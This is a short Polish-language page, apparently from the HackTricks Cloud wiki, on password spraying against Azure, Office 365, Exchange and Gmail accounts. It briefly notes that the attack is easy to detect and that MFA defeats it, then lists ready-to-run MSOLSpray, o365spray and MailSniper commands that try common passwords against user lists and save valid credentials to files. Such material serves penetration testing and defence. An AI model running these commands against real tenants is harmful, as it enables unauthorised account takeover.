Polish - Ht Cloud
HackTricks Training Twitter Linkedin Sponsor

Az - Password Spraying

Naucz się hakować AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)!

Inne sposoby wsparcia HackTricks:

Sprejowanie hasła

W Azure można to zrobić na różnych punktach końcowych API, takich jak Azure AD Graph, Microsoft Graph, usługa raportowania Office 365, itp.

Jednakże, należy zauważyć, że ta technika jest bardzo głośna i Zespół Niebieski może ją łatwo wykryć. Ponadto, wymuszenie złożoności hasła i użycie MFA mogą sprawić, że ta technika stanie się bezużyteczna.

Możesz przeprowadzić atak sprejowania hasła za pomocą MSOLSpray

. .\MSOLSpray\MSOLSpray.ps1
Invoke-MSOLSpray -UserList .\validemails.txt -Password Welcome2022! -Verbose

Lub za pomocą o365spray

python3 o365spray.py --spray -U validemails.txt -p 'Welcome2022!' --count 1 --lockout 1 --domain victim.com

Lub za pomocą MailSniper

#OWA
Invoke-PasswordSprayOWA -ExchHostname mail.domain.com -UserList .\userlist.txt -Password Spring2021 -Threads 15 -OutFile owa-sprayed-creds.txt
#EWS
Invoke-PasswordSprayEWS -ExchHostname mail.domain.com -UserList .\userlist.txt -Password Spring2021 -Threads 15 -OutFile sprayed-ews-creds.txt
#Gmail
Invoke-PasswordSprayGmail -UserList .\userlist.txt -Password Fall2016 -Threads 15 -OutFile gmail-sprayed-creds.txt
Naucz się hakować AWS od zera do bohatera z htARTE (HackTricks AWS Red Team Expert)!

Inne sposoby wsparcia HackTricks:

PreviousAz - Device Code Authentication PhishingNextAz - Services

Last updated